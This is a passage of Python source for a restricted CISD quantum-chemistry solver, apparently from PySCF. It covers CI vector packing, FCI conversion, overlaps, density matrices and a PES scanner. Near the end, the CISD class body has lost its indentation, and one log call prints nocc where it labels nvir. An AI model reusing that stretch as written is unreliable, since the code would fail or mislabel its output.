    t0 -= numpy.einsum('iabj,jiab->', eris.ovvo, c2)
    cinew = numpy.hstack((t0, t1.ravel(), t2.ravel()))
    return cinew
def amplitudes_to_cisdvec(c0, c1, c2):
    '''Pack the CISD amplitudes (c0, c1, c2) into one flat CI vector.'''
    return numpy.concatenate([numpy.ravel(c0), c1.ravel(), c2.ravel()])
def cisdvec_to_amplitudes(civec, nmo, nocc):
    '''Split a flat CISD vector into its (c0, c1, c2) amplitude arrays.

    Returns copies, so callers may modify them without touching civec.
    '''
    nvir = nmo - nocc
    nov = nocc * nvir
    c0 = civec[0].copy()
    c1 = numpy.array(civec[1:1+nov]).reshape(nocc, nvir)
    c2 = numpy.array(civec[1+nov:]).reshape(nocc, nocc, nvir, nvir)
    return c0, c1, c2
def dot(v1, v2, nmo, nocc):
    '''Inner product of two CISD vectors in the CISD metric:
    2*(v1.v2) - c0*c0' - sum_{ijab} c2[j,i,a,b] * c2'[i,j,a,b],
    which removes the double counting of the reference and the
    permutation-redundant doubles.
    '''
    nvir = nmo - nocc
    offset = 1 + nocc * nvir
    shape = (nocc, nocc, nvir, nvir)
    c2_bra = v1[offset:].reshape(shape)
    c2_ket = v2[offset:].reshape(shape)
    result = 2 * numpy.dot(v1, v2)
    result -= v1[0] * v2[0]
    result -= numpy.einsum('jiab,ijab->', c2_bra, c2_ket)
    return result
def t1strs(norb, nelec):
    '''Compute the FCI strings (address) for CIS single-excitation amplitudes
    and the signs of the coefficients when transferring the reference from
    physics vacuum to HF vacuum.

    Thin wrapper around :func:`tn_addrs_signs` with n_excite fixed to 1.
    '''
    return tn_addrs_signs(norb, nelec, 1)
def tn_addrs_signs(norb, nelec, n_excite):
    '''Compute the FCI strings (address) for CIS n-excitation amplitudes and
    the signs of the coefficients when transferring the reference from physics
    vacuum to HF vacuum.
    '''
    if n_excite > nelec:
        # Not enough occupied orbitals to excite: no such amplitudes exist.
        #print("Warning: Not enough occupied orbitals to excite.")
        #return [0], [0]
        return [], []
    nocc = nelec

    hole_strs = cistring.gen_strings4orblist(range(nocc), nocc - n_excite)
    # For HF vacuum, hole operators are ordered from low-lying to high-lying
    # orbitals. It leads to the opposite string ordering.
    hole_strs = hole_strs[::-1]
    # hole_sum[k] = sum of the orbital indices of the holes in string k.
    hole_sum = numpy.zeros(len(hole_strs), dtype=int)
    for i in range(nocc):
        # Bit i cleared means orbital i holds a hole in that string.
        hole_at_i = (hole_strs & (1 << i)) == 0
        hole_sum[hole_at_i] += i

    # The hole operators are listed from low-lying to high-lying orbitals
    # (from left to right). For i-th (0-based) hole operator, the number of
    # orbitals which are higher than i determines the sign. This number
    # equals to nocc-(i+1). After removing the highest hole operator, nocc
    # becomes nocc-1, the sign for next hole operator j will be associated to
    # nocc-1-(j+1). By iteratively calling this procedure, the overall sign
    # for annihilating three holes is (-1)**(3*nocc - 6 - sum i)
    sign = (-1) ** (n_excite * nocc - n_excite*(n_excite+1)//2 - hole_sum)

    particle_strs = cistring.gen_strings4orblist(range(nocc, norb), n_excite)
    # XOR combines each hole string with each particle string into a full
    # excited determinant string.
    strs = hole_strs[:,None] ^ particle_strs
    addrs = cistring.strs2addr(norb, nocc, strs.ravel())
    signs = numpy.vstack([sign] * len(particle_strs)).T.ravel()
    return addrs, signs
def to_fcivec(cisdvec, norb, nelec, frozen=None):
    '''Convert CISD coefficients to FCI coefficients'''
    if isinstance(nelec, (int, numpy.number)):
        nelecb = nelec//2
        neleca = nelec - nelecb
    else:
        neleca, nelecb = nelec
        # Restricted (closed-shell) CISD only.
        assert(neleca == nelecb)

    # Build a boolean mask of frozen orbitals from either an int (freeze the
    # inner-most N) or an explicit index list.
    frozen_mask = numpy.zeros(norb, dtype=bool)
    if frozen is None:
        nfroz = 0
    elif isinstance(frozen, (int, numpy.integer)):
        nfroz = frozen
        frozen_mask[:frozen] = True
    else:
        nfroz = len(frozen)
        frozen_mask[frozen] = True

    nocc = numpy.count_nonzero(~frozen_mask[:neleca])
    nmo = norb - nfroz
    nvir = nmo - nocc
    c0, c1, c2 = cisdvec_to_amplitudes(cisdvec, nmo, nocc)
    t1addr, t1sign = tn_addrs_signs(nmo, nocc, 1)

    na = cistring.num_strings(nmo, nocc)
    fcivec = numpy.zeros((na,na))
    fcivec[0,0] = c0
    # Singles enter the first row/column (pure alpha / pure beta single
    # excitations) with the vacuum-transfer signs.
    fcivec[0,t1addr] = fcivec[t1addr,0] = c1.ravel() * t1sign
    # Opposite-spin doubles: product of one alpha and one beta single.
    c2ab = c2.transpose(0,2,1,3).reshape(nocc*nvir,-1)
    c2ab = numpy.einsum('i,j,ij->ij', t1sign, t1sign, c2ab)
    fcivec[t1addr[:,None],t1addr] = c2ab

    if nocc > 1 and nvir > 1:
        # Same-spin doubles from the antisymmetrized amplitudes, packed over
        # the strict lower triangles of (i>j) and (a>b).
        c2aa = c2 - c2.transpose(1,0,2,3)
        ooidx = numpy.tril_indices(nocc, -1)
        vvidx = numpy.tril_indices(nvir, -1)
        c2aa = c2aa[ooidx][:,vvidx[0],vvidx[1]]
        t2addr, t2sign = tn_addrs_signs(nmo, nocc, 2)
        fcivec[0,t2addr] = fcivec[t2addr,0] = c2aa.ravel() * t2sign

    if nfroz == 0:
        return fcivec

    # Expand the active-space CI vector back into the full orbital space.
    assert(norb < 63)
    strs = cistring.gen_strings4orblist(range(norb), neleca)
    na = len(strs)
    count = numpy.zeros(na, dtype=int)
    parity = numpy.zeros(na, dtype=bool)
    core_mask = numpy.ones(na, dtype=bool)
    # During the loop, count saves the number of occupied orbitals that
    # lower (with small orbital ID) than the present orbital i.
    # Moving all the frozen orbitals to the beginning of the orbital list
    # (before the occupied orbitals) leads to parity odd (= True, with
    # negative sign) or even (= False, with positive sign).
    for i in range(norb):
        if frozen_mask[i]:
            if i < neleca:
                # frozen occupied orbital should be occupied
                core_mask &= (strs & (1 << i)) != 0
                parity ^= (count & 1) == 1
            else:
                # frozen virtual orbital should not be occupied.
                # parity is not needed since it's unoccupied
                core_mask &= (strs & (1 << i)) == 0
        else:
            count += (strs & (1 << i)) != 0
    sub_strs = strs[core_mask & (count == nocc)]
    addrs = cistring.strs2addr(norb, neleca, sub_strs)
    fcivec1 = numpy.zeros((na,na))
    fcivec1[addrs[:,None],addrs] = fcivec
    fcivec1[parity,:] *= -1
    fcivec1[:,parity] *= -1
    return fcivec1
def from_fcivec(ci0, norb, nelec, frozen=None):
    '''Extract CISD coefficients from FCI coefficients'''
    if frozen is not None and frozen != 0:
        raise NotImplementedError
    if isinstance(nelec, (int, numpy.number)):
        nelecb = nelec // 2
        neleca = nelec - nelecb
    else:
        neleca, nelecb = nelec
    nocc = neleca
    nvir = norb - nocc
    # Addresses/signs of the singly-excited determinants in the FCI vector.
    t1addr, t1sign = t1strs(norb, nocc)

    c0 = ci0[0, 0]
    c1 = (ci0[0, t1addr] * t1sign).reshape(nocc, nvir)
    # Doubles block <S_alpha|FCI|S_beta>, with vacuum-transfer signs applied
    # on both sides, then reordered from (ia,jb) to (i,j,a,b).
    doubles = ci0[t1addr[:, None], t1addr]
    c2 = numpy.einsum('i,j,ij->ij', t1sign, t1sign, doubles)
    c2 = c2.reshape(nocc, nvir, nocc, nvir).transpose(0, 2, 1, 3)
    return amplitudes_to_cisdvec(c0, c1, c2)
def overlap(cibra, ciket, nmo, nocc, s=None):
    '''Overlap between two CISD wavefunctions.

    Args:
        s : 2D array
            The overlap matrix of non-orthogonal one-particle basis
    '''
    if s is None:
        # Orthonormal orbitals: the overlap is the plain CISD dot product.
        return dot(cibra, ciket, nmo, nocc)

    DEBUG = True

    nvir = nmo - nocc
    nov = nocc * nvir
    bra0, bra1, bra2 = cisdvec_to_amplitudes(cibra, nmo, nocc)
    ket0, ket1, ket2 = cisdvec_to_amplitudes(ciket, nmo, nocc)

    # Sort the ket orbitals to make the orbitals in bra one-one mapt to orbitals
    # in ket.
    if ((not DEBUG) and
        abs(numpy.linalg.det(s[:nocc,:nocc]) - 1) < 1e-2 and
        abs(numpy.linalg.det(s[nocc:,nocc:]) - 1) < 1e-2):
        ket_orb_idx = numpy.where(abs(s) > 0.9)[1]
        s = s[:,ket_orb_idx]
        oidx = ket_orb_idx[:nocc]
        vidx = ket_orb_idx[nocc:] - nocc
        ket1 = ket1[oidx[:,None],vidx]
        ket2 = ket2[oidx[:,None,None,None],oidx[:,None,None],vidx[:,None],vidx]

    # Antisymmetrized (same-spin) doubles, packed over the strict lower
    # triangles of the occupied and virtual index pairs.
    ooidx = numpy.tril_indices(nocc, -1)
    vvidx = numpy.tril_indices(nvir, -1)
    bra2aa = bra2 - bra2.transpose(1,0,2,3)
    bra2aa = lib.take_2d(bra2aa.reshape(nocc**2,nvir**2),
                         ooidx[0]*nocc+ooidx[1], vvidx[0]*nvir+vvidx[1])
    ket2aa = ket2 - ket2.transpose(1,0,2,3)
    ket2aa = lib.take_2d(ket2aa.reshape(nocc**2,nvir**2),
                         ooidx[0]*nocc+ooidx[1], vvidx[0]*nvir+vvidx[1])

    # Occupation lists for the reference, single, and same-spin double
    # excitation determinants; used to form determinant-overlap minors.
    occlist0 = numpy.arange(nocc).reshape(1,nocc)
    occlists = numpy.repeat(occlist0, 1+nov+bra2aa.size, axis=0)
    occlist0 = occlists[:1]
    occlist1 = occlists[1:1+nov]
    occlist2 = occlists[1+nov:]

    ia = 0
    for i in range(nocc):
        for a in range(nocc, nmo):
            occlist1[ia,i] = a
            ia += 1

    ia = 0
    for i in range(nocc):
        for j in range(i):
            for a in range(nocc, nmo):
                for b in range(nocc, a):
                    occlist2[ia,i] = a
                    occlist2[ia,j] = b
                    ia += 1

    na = len(occlists)
    if DEBUG:
        # Reference implementation: build the full determinant-overlap
        # transformation matrix (all minors) and contract in one shot.
        trans = numpy.empty((na,na))
        for i, idx in enumerate(occlists):
            s_sub = s[idx].T.copy()
            minors = s_sub[occlists]
            trans[i,:] = numpy.linalg.det(minors)

        # Mimic the transformation einsum('ab,ap->pb', FCI, trans).
        # The wavefunction FCI has the [excitation_alpha,excitation_beta]
        # representation. The zero blocks like FCI[S_alpha,D_beta],
        # FCI[D_alpha,D_beta], are explicitly excluded.
        bra_mat = numpy.zeros((na,na))
        bra_mat[0,0] = bra0
        bra_mat[0,1:1+nov] = bra_mat[1:1+nov,0] = bra1.ravel()
        bra_mat[0,1+nov:] = bra_mat[1+nov:,0] = bra2aa.ravel()
        bra_mat[1:1+nov,1:1+nov] = bra2.transpose(0,2,1,3).reshape(nov,nov)
        ket_mat = numpy.zeros((na,na))
        ket_mat[0,0] = ket0
        ket_mat[0,1:1+nov] = ket_mat[1:1+nov,0] = ket1.ravel()
        ket_mat[0,1+nov:] = ket_mat[1+nov:,0] = ket2aa.ravel()
        ket_mat[1:1+nov,1:1+nov] = ket2.transpose(0,2,1,3).reshape(nov,nov)
        ovlp = lib.einsum('ab,ap,bq,pq->', bra_mat, trans, trans, ket_mat)
    else:
        # Memory-lean path: only the S/S, S/D and D/S minor blocks are
        # materialized; the D/D block is handled separately below.
        nov1 = 1 + nov
        noovv = bra2aa.size
        bra_SS = numpy.zeros((nov1,nov1))
        bra_SS[0,0] = bra0
        bra_SS[0,1:] = bra_SS[1:,0] = bra1.ravel()
        bra_SS[1:,1:] = bra2.transpose(0,2,1,3).reshape(nov,nov)
        ket_SS = numpy.zeros((nov1,nov1))
        ket_SS[0,0] = ket0
        ket_SS[0,1:] = ket_SS[1:,0] = ket1.ravel()
        ket_SS[1:,1:] = ket2.transpose(0,2,1,3).reshape(nov,nov)

        trans_SS = numpy.empty((nov1,nov1))
        trans_SD = numpy.empty((nov1,noovv))
        trans_DS = numpy.empty((noovv,nov1))
        occlist01 = occlists[:nov1]
        for i, idx in enumerate(occlist01):
            s_sub = s[idx].T.copy()
            minors = s_sub[occlist01]
            trans_SS[i,:] = numpy.linalg.det(minors)
            minors = s_sub[occlist2]
            trans_SD[i,:] = numpy.linalg.det(minors)
            s_sub = s[:,idx].copy()
            minors = s_sub[occlist2]
            trans_DS[:,i] = numpy.linalg.det(minors)

        ovlp = lib.einsum('ab,ap,bq,pq->', bra_SS, trans_SS, trans_SS, ket_SS)
        ovlp+= lib.einsum('ab,a ,bq, q->', bra_SS, trans_SS[:,0], trans_SD, ket2aa.ravel())
        ovlp+= lib.einsum('ab,ap,b ,p ->', bra_SS, trans_SD, trans_SS[:,0], ket2aa.ravel())
        ovlp+= lib.einsum(' b, p,bq,pq->', bra2aa.ravel(), trans_SS[0,:], trans_DS, ket_SS)
        ovlp+= lib.einsum(' b, p,b ,p ->', bra2aa.ravel(), trans_SD[0,:], trans_DS[:,0],
                          ket2aa.ravel())
        ovlp+= lib.einsum('a ,ap, q,pq->', bra2aa.ravel(), trans_DS, trans_SS[0,:], ket_SS)
        ovlp+= lib.einsum('a ,a , q, q->', bra2aa.ravel(), trans_DS[:,0], trans_SD[0,:],
                          ket2aa.ravel())

        # FIXME: whether to approximate the overlap between double excitation coefficients
        if numpy.linalg.norm(bra2aa)*numpy.linalg.norm(ket2aa) < 1e-4:
            # Skip the overlap if coefficients of double excitation are small enough
            pass
        if (abs(numpy.linalg.det(s[:nocc,:nocc]) - 1) < 1e-2 and
            abs(numpy.linalg.det(s[nocc:,nocc:]) - 1) < 1e-2):
            # If the overlap matrix close to identity enough, use the <D|D'> overlap
            # for orthogonal single-particle basis to approximate the overlap
            # for non-orthogonal basis.
            ovlp+= numpy.dot(bra2aa.ravel(), ket2aa.ravel()) * trans_SS[0,0] * 2
        else:
            # Exact D/D contribution: compute trans_DD.dot(ket2aa) row by
            # row, fanned out over processes via a shared result buffer.
            from multiprocessing import sharedctypes, Process
            buf_ctypes = sharedctypes.RawArray('d', noovv)
            trans_ket = numpy.ndarray(noovv, buffer=buf_ctypes)
            def trans_dot_ket(i0, i1):
                # Fill trans_ket[i0:i1] in the shared buffer.
                for i in range(i0, i1):
                    s_sub = s[occlist2[i]].T.copy()
                    minors = s_sub[occlist2]
                    trans_ket[i] = numpy.linalg.det(minors).dot(ket2aa.ravel())
            nproc = lib.num_threads()
            if nproc > 1:
                seg = (noovv+nproc-1) // nproc
                ps = []
                for i0,i1 in lib.prange(0, noovv, seg):
                    p = Process(target=trans_dot_ket, args=(i0,i1))
                    ps.append(p)
                    p.start()
                [p.join() for p in ps]
            else:
                trans_dot_ket(0, noovv)
            ovlp+= numpy.dot(bra2aa.ravel(), trans_ket) * trans_SS[0,0] * 2
    return ovlp
def make_rdm1(myci, civec=None, nmo=None, nocc=None, ao_repr=False):
    r'''
    Spin-traced one-particle density matrix in MO basis (the occupied-virtual
    blocks from the orbital response contribution are not included).

    dm1[p,q] = <q_alpha^\dagger p_alpha> + <q_beta^\dagger p_beta>

    The convention of 1-pdm is based on McWeeney's book, Eq (5.4.20).
    The contraction between 1-particle Hamiltonian and rdm1 is
    E = einsum('pq,qp', h1, rdm1)
    '''
    civec = myci.ci if civec is None else civec
    nmo = myci.nmo if nmo is None else nmo
    nocc = myci.nocc if nocc is None else nocc
    intermediates = _gamma1_intermediates(myci, civec, nmo, nocc)
    return ccsd_rdm._make_rdm1(myci, intermediates, with_frozen=True,
                               ao_repr=ao_repr)
def make_rdm2(myci, civec=None, nmo=None, nocc=None, ao_repr=False):
    r'''
    Spin-traced two-particle density matrix in MO basis

    dm2[p,q,r,s] = \sum_{sigma,tau} <p_sigma^\dagger r_tau^\dagger s_tau q_sigma>

    Note the contraction between ERIs (in Chemist's notation) and rdm2 is
    E = einsum('pqrs,pqrs', eri, rdm2)
    '''
    civec = myci.ci if civec is None else civec
    nmo = myci.nmo if nmo is None else nmo
    nocc = myci.nocc if nocc is None else nocc
    d1 = _gamma1_intermediates(myci, civec, nmo, nocc)
    # The 2-RDM intermediates live in a temporary HDF5 file; keep it alive
    # until _make_rdm2 has consumed the datasets.
    tmpfile = lib.H5TmpFile()
    d2 = _gamma2_outcore(myci, civec, nmo, nocc, tmpfile, False)
    return ccsd_rdm._make_rdm2(myci, d1, d2, with_dm1=True, with_frozen=True,
                               ao_repr=ao_repr)
def _gamma1_intermediates(myci, civec, nmo, nocc):
    '''Build the (oo, ov, vo, vv) blocks of the CISD 1-RDM intermediates
    from the CI coefficients.'''
    c0, c1, c2 = myci.cisdvec_to_amplitudes(civec, nmo, nocc)
    # Spin-adapted doubles combination 2*c2 - c2(ijba).
    theta = 2 * c2 - c2.transpose(0, 1, 3, 2)

    dvo = c0.conj() * c1.T
    dvo += 2 * numpy.einsum('jb,ijab->ai', c1.conj(), c2)
    dvo -= numpy.einsum('jb,ijba->ai', c1.conj(), c2)
    dov = dvo.T.conj()

    doo = -numpy.einsum('ia,ka->ik', c1.conj(), c1)
    doo -= lib.einsum('ijab,ikab->jk', c2.conj(), theta)
    dvv = numpy.einsum('ia,ic->ac', c1, c1.conj())
    dvv += lib.einsum('ijab,ijac->bc', theta, c2.conj())
    return doo, dov, dvo, dvv
def _gamma2_intermediates(myci, civec, nmo, nocc, compress_vvvv=False):
    '''In-core wrapper around :func:`_gamma2_outcore`: materialize the 2-RDM
    intermediates from the temporary HDF5 file into numpy arrays.'''
    tmpfile = lib.H5TmpFile()
    _gamma2_outcore(myci, civec, nmo, nocc, tmpfile, compress_vvvv)
    return (tmpfile['dovov'][:], tmpfile['dvvvv'][:], tmpfile['doooo'][:],
            tmpfile['doovv'][:], tmpfile['dovvo'][:], None,
            tmpfile['dovvv'][:], tmpfile['dooov'][:])
def _gamma2_outcore(myci, civec, nmo, nocc, h5fobj, compress_vvvv=False):
    '''Compute the CISD 2-RDM intermediates and store them in the HDF5 file
    h5fobj, blocking over the virtual index to bound the memory footprint.'''
    log = logger.Logger(myci.stdout, myci.verbose)
    # NOTE(review): the nmo/nocc arguments are immediately overridden by the
    # attributes on myci -- they seem to exist only for API symmetry with
    # _gamma1_intermediates; confirm before relying on them.
    nocc = myci.nocc
    nmo = myci.nmo
    nvir = nmo - nocc
    nvir_pair = nvir * (nvir+1) // 2
    c0, c1, c2 = myci.cisdvec_to_amplitudes(civec, nmo, nocc)

    h5fobj['dovov'] = (2*c0*c2.conj().transpose(0,2,1,3) -
                       c0*c2.conj().transpose(1,2,0,3))

    doooo = lib.einsum('ijab,klab->ijkl', c2.conj(), c2)
    h5fobj['doooo'] = doooo.transpose(0,2,1,3) - doooo.transpose(1,2,0,3)*.5
    doooo = None

    dooov = -lib.einsum('ia,klac->klic', c1*2, c2.conj())
    h5fobj['dooov'] = dooov.transpose(0,2,1,3)*2 - dooov.transpose(1,2,0,3)
    dooov = None

    #:dvovv = numpy.einsum('ia,ikcd->akcd', c1, c2) * 2
    #:dvvvv = lib.einsum('ijab,ijcd->abcd', c2, c2)
    # The vvvv/ovvv blocks are produced in virtual-index blocks sized to the
    # available memory.
    max_memory = max(0, myci.max_memory - lib.current_memory()[0])
    unit = max(nocc**2*nvir*2+nocc*nvir**2*3 + 1, nvir**3*2+nocc*nvir**2 + 1)
    blksize = min(nvir, max(BLKMIN, int(max_memory*.9e6/8/unit)))
    log.debug1('rdm intermediates: block size = %d, nvir = %d in %d blocks',
               blksize, nocc, int((nvir+blksize-1)/blksize))
    dtype = numpy.result_type(civec).char
    dovvv = h5fobj.create_dataset('dovvv', (nocc,nvir,nvir,nvir), dtype,
                                  chunks=(nocc,min(nocc,nvir),1,nvir))
    if compress_vvvv:
        dvvvv = h5fobj.create_dataset('dvvvv', (nvir_pair,nvir_pair), dtype)
    else:
        dvvvv = h5fobj.create_dataset('dvvvv', (nvir,nvir,nvir,nvir), dtype)

    for (p0, p1) in lib.prange(0, nvir, blksize):
        theta = c2[:,:,p0:p1] - c2[:,:,p0:p1].transpose(1,0,2,3) * .5
        gvvvv = lib.einsum('ijab,ijcd->abcd', theta.conj(), c2)
        if compress_vvvv:
            # symmetrize dvvvv because it does not affect the results of cisd_grad
            # dvvvv = (dvvvv+dvvvv.transpose(0,1,3,2)) * .5
            # dvvvv = (dvvvv+dvvvv.transpose(1,0,2,3)) * .5
            # now dvvvv == dvvvv.transpose(0,1,3,2) == dvvvv.transpose(1,0,3,2)
            tmp = numpy.empty((nvir,nvir,nvir))
            tmpvvvv = numpy.empty((p1-p0,nvir,nvir_pair))
            for i in range(p1-p0):
                tmp[:] = gvvvv[i].conj().transpose(1,0,2)
                lib.pack_tril(tmp+tmp.transpose(0,2,1), out=tmpvvvv[i])
            # tril of (dvvvv[p0:p1,p0:p1]+dvvvv[p0:p1,p0:p1].T)
            for i in range(p0, p1):
                for j in range(p0, i):
                    tmpvvvv[i-p0,j] += tmpvvvv[j-p0,i]
                tmpvvvv[i-p0,i] *= 2
            for i in range(p1, nvir):
                off = i * (i+1) // 2
                dvvvv[off+p0:off+p1] = tmpvvvv[:,i]
            for i in range(p0, p1):
                off = i * (i+1) // 2
                if p0 > 0:
                    tmpvvvv[i-p0,:p0] += dvvvv[off:off+p0]
                dvvvv[off:off+i+1] = tmpvvvv[i-p0,:i+1] * .25
            tmp = tmpvvvv = None
        else:
            for i in range(p0, p1):
                dvvvv[i] = gvvvv[i-p0].conj().transpose(1,0,2)

        gvovv = numpy.einsum('ia,ikcd->akcd', c1[:,p0:p1].conj()*2, c2)
        gvovv = gvovv.conj()
        dovvv[:,:,p0:p1] = gvovv.transpose(1,3,0,2)*2 - gvovv.transpose(1,2,0,3)

    theta = c2*2 - c2.transpose(1,0,2,3)
    doovv = numpy.einsum('ia,kc->ikca', c1.conj(), -c1)
    doovv -= lib.einsum('kjcb,kica->jiab', c2.conj(), theta)
    doovv -= lib.einsum('ikcb,jkca->ijab', c2.conj(), theta)
    h5fobj['doovv'] = doovv
    doovv = None

    dovvo = lib.einsum('ikac,jkbc->iabj', theta.conj(), theta)
    dovvo += numpy.einsum('ia,kc->iack', c1.conj(), c1) * 2
    h5fobj['dovvo'] = dovvo
    theta = dovvo = None
    dvvov = None
    return (h5fobj['dovov'], h5fobj['dvvvv'], h5fobj['doooo'], h5fobj['doovv'],
            h5fobj['dovvo'], dvvov , h5fobj['dovvv'], h5fobj['dooov'])
def trans_rdm1(myci, cibra, ciket, nmo=None, nocc=None):
    r'''
    Spin-traced one-particle transition density matrix in MO basis.

    dm1[p,q] = <q_alpha^\dagger p_alpha> + <q_beta^\dagger p_beta>

    The convention of 1-pdm is based on McWeeney's book, Eq (5.4.20).
    The contraction between 1-particle Hamiltonian and rdm1 is
    E = einsum('pq,qp', h1, rdm1)
    '''
    if nmo is None: nmo = myci.nmo
    if nocc is None: nocc = myci.nocc
    c0bra, c1bra, c2bra = myci.cisdvec_to_amplitudes(cibra, nmo, nocc)
    c0ket, c1ket, c2ket = myci.cisdvec_to_amplitudes(ciket, nmo, nocc)

    # Virtual-occupied block built from bra amplitudes times ket doubles.
    dvo = c0bra.conj() * c1ket.T
    dvo += numpy.einsum('jb,ijab->ai', c1bra.conj(), c2ket) * 2
    dvo -= numpy.einsum('jb,ijba->ai', c1bra.conj(), c2ket)

    # The ov block is computed independently (bra != ket for transition DMs,
    # so it is not simply the conjugate transpose of dvo).
    dov = c0ket * c1bra.conj()
    dov += numpy.einsum('jb,ijab->ia', c1ket, c2bra.conj()) * 2
    dov -= numpy.einsum('jb,ijba->ia', c1ket, c2bra.conj())

    theta = c2ket*2 - c2ket.transpose(0,1,3,2)
    doo = -numpy.einsum('ia,ka->ik', c1bra.conj(), c1ket)
    doo -= lib.einsum('ijab,ikab->jk', c2bra.conj(), theta)
    dvv = numpy.einsum('ia,ic->ac', c1ket, c1bra.conj())
    dvv += lib.einsum('ijab,ijac->bc', theta, c2bra.conj())

    # Assemble the blocks; factor 2 traces over spin.
    dm1 = numpy.empty((nmo,nmo), dtype=doo.dtype)
    dm1[:nocc,:nocc] = doo * 2
    dm1[:nocc,nocc:] = dov * 2
    dm1[nocc:,:nocc] = dvo * 2
    dm1[nocc:,nocc:] = dvv * 2
    # Reference (HF) contribution, scaled by the CI overlap <bra|ket>.
    norm = dot(cibra, ciket, nmo, nocc)
    dm1[numpy.diag_indices(nocc)] += 2 * norm

    if myci.frozen is not None:
        # Embed the active-space DM into the full MO space; frozen occupied
        # orbitals carry the reference occupation 2*norm.
        nmo = myci.mo_occ.size
        nocc = numpy.count_nonzero(myci.mo_occ > 0)
        rdm1 = numpy.zeros((nmo,nmo), dtype=dm1.dtype)
        rdm1[numpy.diag_indices(nocc)] = 2 * norm
        moidx = numpy.where(myci.get_frozen_mask())[0]
        rdm1[moidx[:,None],moidx] = dm1
        dm1 = rdm1
    return dm1
def as_scanner(ci):
    '''Generating a scanner/solver for CISD PES.

    The returned solver is a function. This function requires one argument
    "mol" as input and returns total CISD energy.

    The solver will automatically use the results of last calculation as the
    initial guess of the new calculation. All parameters assigned in the
    CISD and the underlying SCF objects (conv_tol, max_memory etc) are
    automatically applied in the solver.

    Note scanner has side effects. It may change many underlying objects
    (_scf, with_df, with_x2c, ...) during calculation.

    Examples::

        >>> from pyscf import gto, scf, ci
        >>> mol = gto.M(atom='H 0 0 0; F 0 0 1')
        >>> ci_scanner = ci.CISD(scf.RHF(mol)).as_scanner()
        >>> e_tot = ci_scanner(gto.M(atom='H 0 0 0; F 0 0 1.1'))
        >>> e_tot = ci_scanner(gto.M(atom='H 0 0 0; F 0 0 1.5'))
    '''
    from pyscf import gto
    if isinstance(ci, lib.SinglePointScanner):
        # Already a scanner: return it unchanged.
        return ci

    logger.info(ci, 'Set %s as a scanner', ci.__class__)

    # The scanner subclasses the concrete CISD type so all of its settings
    # and methods carry over.
    class CISD_Scanner(ci.__class__, lib.SinglePointScanner):
        def __init__(self, ci):
            self.__dict__.update(ci.__dict__)
            self._scf = ci._scf.as_scanner()
        def __call__(self, mol_or_geom, ci0=None, **kwargs):
            if isinstance(mol_or_geom, gto.Mole):
                mol = mol_or_geom
            else:
                mol = self.mol.set_geom_(mol_or_geom, inplace=False)
            self.reset(mol)
            # Re-run the underlying SCF on the new geometry first.
            mf_scanner = self._scf
            mf_scanner(mol)
            self.mo_coeff = mf_scanner.mo_coeff
            self.mo_occ = mf_scanner.mo_occ
            # Discard the stored CI vector if the problem size changed.
            if getattr(self.ci, 'size', 0) != self.vector_size():
                self.ci = None
            if ci0 is None:
                # FIXME: Whether to use the initial guess from last step?
                # If root flips, large errors may be found in the solutions
                ci0 = self.ci
            self.kernel(ci0, **kwargs)[0]
            return self.e_tot
    return CISD_Scanner(ci)
class CISD(lib.StreamObject):
'''restricted CISD
Attributes:
verbose : int
Print level. Default value equals to :class:`Mole.verbose`
max_memory : float or int
Allowed memory in MB. Default value equals to
:class:`Mole.max_memory`
conv_tol : float
converge threshold. Default is 1e-9.
max_cycle : int
max number of iterations. Default is 50.
max_space : int
Davidson diagonalization space size. Default is 12.
direct : bool
AO-direct CISD. Default is False.
async_io : bool
Allow for asynchronous function execution. Default is True.
frozen : int or list
If integer is given, the inner-most orbitals are frozen from CI
amplitudes. Given the orbital indices (0-based) in a list, both
occupied and virtual orbitals can be frozen in CI calculation.
>>> mol = gto.M(atom = 'H 0 0 0; F 0 0 1.1', basis = 'ccpvdz')
>>> mf = scf.RHF(mol).run()
>>> # freeze 2 core orbitals
>>> myci = ci.CISD(mf).set(frozen = 2).run()
>>> # freeze 2 core orbitals and 3 high lying unoccupied orbitals
>>> myci.set(frozen = [0,1,16,17,18]).run()
Saved results
converged : bool
CISD converged or not
e_corr : float
CISD correlation correction
e_tot : float
Total CCSD energy (HF + correlation)
ci :
CI wavefunction coefficients
'''
conv_tol = getattr(__config__, 'ci_cisd_CISD_conv_tol', 1e-9)
max_cycle = getattr(__config__, 'ci_cisd_CISD_max_cycle', 50)
max_space = getattr(__config__, 'ci_cisd_CISD_max_space', 12)
lindep = getattr(__config__, 'ci_cisd_CISD_lindep', 1e-14)
level_shift = getattr(__config__, 'ci_cisd_CISD_level_shift', 0) # in preconditioner
direct = getattr(__config__, 'ci_cisd_CISD_direct', False)
async_io = getattr(__config__, 'ci_cisd_CISD_async_io', True)
    def __init__(self, mf, frozen=None, mo_coeff=None, mo_occ=None):
        # Guard against a common mistake: CISD requires an HF reference,
        # not a DFT one.
        if 'dft' in str(mf.__module__):
            raise RuntimeError('CISD Warning: The first argument mf is a DFT object. '
                               'CISD calculation should be initialized with HF object.\n'
                               'DFT object can be converted to HF object with '
                               'the code below:\n'
                               '    mf_hf = scf.RHF(mol)\n'
                               '    mf_hf.__dict__.update(mf_dft.__dict__)\n')

        if mo_coeff is None: mo_coeff = mf.mo_coeff
        if mo_occ is None: mo_occ = mf.mo_occ

        self.mol = mf.mol
        self._scf = mf
        self.verbose = self.mol.verbose
        self.stdout = self.mol.stdout
        self.max_memory = mf.max_memory
        self.nroots = 1          # number of CI roots to solve for
        self.frozen = frozen     # frozen-orbital specification (int or index list)
        self.chkfile = mf.chkfile

##################################################
# don't modify the following attributes, they are not input options
        self.converged = False
        self.mo_coeff = mo_coeff
        self.mo_occ = mo_occ
        self.e_corr = None
        self.emp2 = None
        self.ci = None
        self._nocc = None
        self._nmo = None
        # Attributes recognized by check_sanity()/StreamObject machinery.
        keys = set(('conv_tol', 'max_cycle', 'max_space', 'lindep',
                    'level_shift', 'direct'))
        self._keys = set(self.__dict__.keys()).union(keys)
def dump_flags(self, verbose=None):
log = logger.new_logger(self, verbose)
log.info('')
log.info('******** %s ********', self.__class__)
log.info('CISD nocc = %s, nmo = %s', self.nocc, self.nmo)
if self.frozen is not None:
log.info('frozen orbitals %s', str(self.frozen))
log.info('max_cycle = %d', self.max_cycle)
log.info('direct = %d', self.direct)
log.info('conv_tol = %g', self.conv_tol)
log.info('max_cycle = %d', self.max_cycle)
log.info('max_space = %d', self.max_space)
log.info('lindep = %d', self.lindep)
log.info('nroots = %d', self.nroots)
log.info('max_memory %d MB (current use %d MB)',
self.max_memory, lib.current_memory()[0])
return self
    @property
    def e_tot(self):
